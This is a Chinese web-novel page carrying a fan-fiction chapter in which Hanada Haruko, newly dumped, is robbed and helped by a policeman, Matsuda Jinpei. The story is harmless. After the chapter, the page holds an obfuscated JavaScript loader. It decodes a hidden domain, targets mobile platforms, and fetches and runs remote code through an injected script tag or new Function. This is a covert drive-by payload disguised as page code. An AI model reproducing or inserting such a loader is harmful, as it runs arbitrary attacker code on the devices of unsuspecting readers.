烽火小说网

阅读记录  |   用户书架
上一章
目录 | 设置
下一章

分手X联谊X抢劫(1 / 1)

加入书签 | 推荐本书 | 问题反馈 |

分手X联谊X抢劫



再来一杯!温馨的家庭餐厅,一个女人趴在桌上要哭不哭地憋红眼睛。路过的服务生有点头疼地黑线汗颜。

啊哈哈别管她。我们有需要再叫你。从大阪来的朋友梅香无语地看着一脸难过的花田晴子,再来一杯个鬼,真以为喝杯咖啡也会醉吗。

花田晴子支起身子,泪眼红红,拿起黑咖一饮而下啪地放在桌上,你不懂,我现在心比黑咖还苦。梅香,呜呜呜我失恋了TAT

梅香撑着下巴,比着刚做好的美甲欣赏,闻言啧啧几声,失恋而已,我还以为你失业呢。不过是男人罢了。

说得轻巧,她可是好不容易才鼓起勇气认真谈恋爱的,哭,和朝日奈枣坦白一切后,她现在还能清晰想起他当时的神情——震惊不解、愤怒难过、还有她看不懂的复杂情绪。

窒息的沉默横亘在他们之间,朝日奈枣垂眸,攥紧拳头,好一会才沙哑地开口:很抱歉,目前…我目前无法接受。

所以,就这样分手了。

花田晴子转头看向窗外苦着脸,阳光如此明媚,花儿如此娇艳,她的心却是秋风瑟瑟。

梅香:……真受不了。

服务员麻烦上杯牛奶。梅香将牛奶放到花田晴子嘴边,怒其不争地说:喝杯奶清醒下吧你,这世界上晴朗的天气都比男人稀罕。放着大好天气不管哭男人你还是人吗?

分手了不是更好,以后看上谁就直接做情人炮友,省的名分套来套去。

她的嗓音不大,但也没刻意压低,坐在她背后椅子另一桌的栗发男人被大胆直接的发言呛到。

花田晴子表示梅香这个想法十分刺激,慢吞吞喝着牛奶,不知道怎么回复好,但对方也不用她回答,转而另起话题,既然被甩了就赶紧开始新生活,过渡到下个男人,明天的联谊你一定不能不去了。

并没有觉得之间有什么必然联系,花田晴子咬着吸管,对梅香的提议兴致缺缺。中学同学会兼联谊会,一群自己都不知道多少年没联系过的人也不一定还记得彼此的人聚在一起,进行大人式谈话打哈哈没营养的对话。

想想就没意思。

梅香不满,手指戳着晴子的额头,这次你一定要去。听说白石前辈也会来哦。

花田晴子立刻睁大眼睛,骗人!白石藏之介,她从初中入学起就崇拜的高中部前辈,四天宝寺的完美男人,怎么会需要参加联谊会啊。

消息绝对可靠,听说好像组织者是当年网球部后援会的人吧,明天联谊还有外校的哦,不过具体人物就不知道了。梅香叉起小蛋糕咬了一口,所以她今天才特地去做美甲美容嘛。

花田晴子的眼神燃起斗志,我、我知道了。如果白石前辈真的来的话,开玩笑,说什么也要去。

梅香点点头,而后死鱼眼地盯着晴子土味的大T恤,事先说明,你明天要是穿这样T恤阔腿裤去的话,别说认识我哦。

晴子涨红脸,我还没有没常识到那个地步啦。大人的社会交际,她也是懂一点的好吗。

几年前大一那条小黑裙也不行哦,过时都好几年了。面试的西装裙也绝对达咩。

晴子被说得逐渐低下头,对手指。

……我说你啊,今天赶紧买身新衣服吧,发型也整整。再做个美容spa,以新面貌迎接新人生吧。看着花田晴子耷拉的肩膀和快要埋到桌子里的头,梅香无奈摇头。

新人生、新人生,晴子心里默念,没错,既然她都得这hentai的发情怪病了,她要,抛弃一切!抛弃过去!花田晴子猛地抬头,将牛奶一饮而尽,复活的姿态发言,你说得对!我要一个新的开始。

——虽然说,气势看起来有点像下一秒要去干架就是。

*

呵呵,手冢,看来明天的联谊会很好玩了。即便长大了也不改爱看热闹乐子人性格的不二周助笑眯眯。

手冢国光闻言闭眼,心里暗自叹了口气,再睁眼还是一贯的冷静严肃,不要大意。

——不是,联谊会倒也不至于那么危险需要严阵以待。

*

从女装店出来的花田晴子提着大纸袋,这回真是钱包大出血了。走了几步她顿住,啊啊我是不是一时冲动买太多了。仔细想想,她在游戏公司上班,根本没多少机会穿这些服装啊。

裙子、丝袜、还有新内衣。

……算了留着吧,指不定哪天就需要了。花钱的快感冲淡了难过,她提起袋子,皱眉犹豫了一会,还是决定不去退了。

后方传来呼啸的摩托引擎声,花田晴子下意识回头侧身避让,但车上的小混混却一把拽过手上的袋子把她拖倒在地。

晴子摔下双手撑地,手掌擦伤破皮,不过顾不上了,她迈步开追,抢劫啊——

她的新衣服,重点是她的钱包,都在袋子里啊!!

行人唯恐避闪不及,摩托车一路开走,好在是大直路晴子光靠两条腿不至于跟丢。可、可恶啊!来个谁都好,快点把他拦住啊——

糟了,拐巷子里了!

喘着气追进巷子里的时候,晴子都快放弃了,没想到入目的是倒地的摩托车和晕倒不知情况的抢劫犯,唯一站着的是一个穿着黑色西服,戴着墨镜的卷发男人。

是他帮忙的吗?

晴子扶着墙喘气,小声地开口,谢、谢谢…一张嘴就难受地皱眉痛苦,喉咙发干因为剧烈跑动而忍不住咳嗽。

小步靠近男人,他身材高挑,戴着墨镜看起来有点可怕不好惹,晴子虚声道:他抢了我东西,谢谢你。

不客气,看看有没有少什么东西吧。有些冷淡又漫不经心的语气。即便抢劫犯已经晕了过去,他也抽出犯人的腰带把他手捆了起来。

袋子的东西洒了出来,估计是摩托车倒的时候犯人脱手而出的缘故,晴子苦着脸捡起掉出的钱包确认里面没少钱,又捡起刚买就弄脏了的新裙子,希望别破啊。

可最麻烦的是——

花田晴子抬头看向树枝上招摇的性感黑色蕾丝文胸。在风中摇摇晃晃就是不掉,啊——救命,为什么会掉到这种地方啊??

晴子尴尬地想抠出城堡,她的新生活似乎开局就不顺。她扭头看向还停在现场的卷发男人,似乎是很有责任感的等她确认损失的样子。

他散漫地打了个哈欠,那头卷发在风中看起来蓬蓬松松很柔软。

那个,请问能麻烦你帮我拿下吗?拜托了……

哈?松田阵平顺着女人的视线转向树枝上的文胸——奇怪,这玩意原来刚刚有飞那么高吗?

因为我太矮了,拜托了,我花了好多钱买的……要是等她借梯子来拿不知道还要在这挂多久会不会被围观,花田晴子内心宽面条泪。

松田阵平:……

你离远点。

气场两米八的男人后退助跑几步,笔挺西裤包裹的长腿一蹬一跳,轻松而准确地将树上的文胸抓下。给。

低头的花田晴子没有留意到松田一闪而过的尴尬红晕。

好惊人的弹跳力,晴子赞叹。眼神也变得亮晶晶的,谢谢,你好厉害呀!我没有丢东西,太感谢了。

我是花田晴子,请问你怎么称呼呢?我请你喝杯东西吧。

不用客气,松田阵平,是个警察。松田语气平淡地回答,这不过是犯人刚好倒霉碰上他了。

警察很快就到,你最好留下来录个口供。

我知道了。是个沉默寡言的酷盖警察先生欸,看到男人迈步打算离开,花田晴子急忙开口:麻烦等一下,不好意思请在这等几分钟我很快回来。

拿起钱包往巷子口的自动贩卖机跑去,冰咖啡一掉她就冲回来。

小小心意,请务必收下。看他刚刚打哈欠的样子,应该是困了吧?

松田定睛看了下咖啡,没有推辞,谢了。你的手擦伤最好快点处理。破皮的手心被冰饮料罐的水珠衬得更显眼了。

*

目送酷盖警察离开,花田晴子目光移向地上的抢劫犯,哼哼,可恶的混蛋,人模人样不干正事,她要好好教训他!

眼珠一转,花田晴子嘿嘿地拿出包里的纸笔,大笔一挥写下我是抢劫犯,我错了贴到他的背后衣服。就要让你社死!

折返回来想提醒什么刚好目睹的松田阵平:……看起来好像在干什么幼稚的坏事呢。



function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2tqaGRiaGpzYmprZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间